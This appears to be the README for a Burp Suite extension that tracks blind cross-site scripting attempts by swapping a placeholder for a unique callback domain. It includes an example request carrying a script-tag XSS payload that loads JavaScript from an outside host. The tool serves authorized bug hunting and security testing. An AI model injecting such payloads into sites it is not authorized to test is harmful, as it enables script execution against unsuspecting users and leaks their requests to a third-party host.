This tool can be used to generate relevant XSS addresses that can be used to track HTTP requests. By using this tool, all your injection attempts will be tracked and the reports you generate will include the full HTTP request in the final output.
2023.1
Because of the use of Burp Extensions API - Montoya
You can download the jar directly and load it into burpsuite.
After loading the plugin, a new tab will be created, as shown below.
Just fill in the form and click Login.
replace is the javascript address that needs to be replaced. (Try to ensure that replace is unlikely to appear in normal http. Guarantee uniqueness.)
For example (replace is test123)
GET /concat-us HTTP/1.1
Host: example.com
aaa: test123
content=testhello<script src="test123"></script>
Finally the extension will automatically update the request
GET /concat-us HTTP/1.1
Host: example.com
aaa: https://request-id-domain.xss.cl
content=testhello<script src="https://request-id-domain.xss.cl"></script>
https://xss.bughunter.app/dashboard/trigger
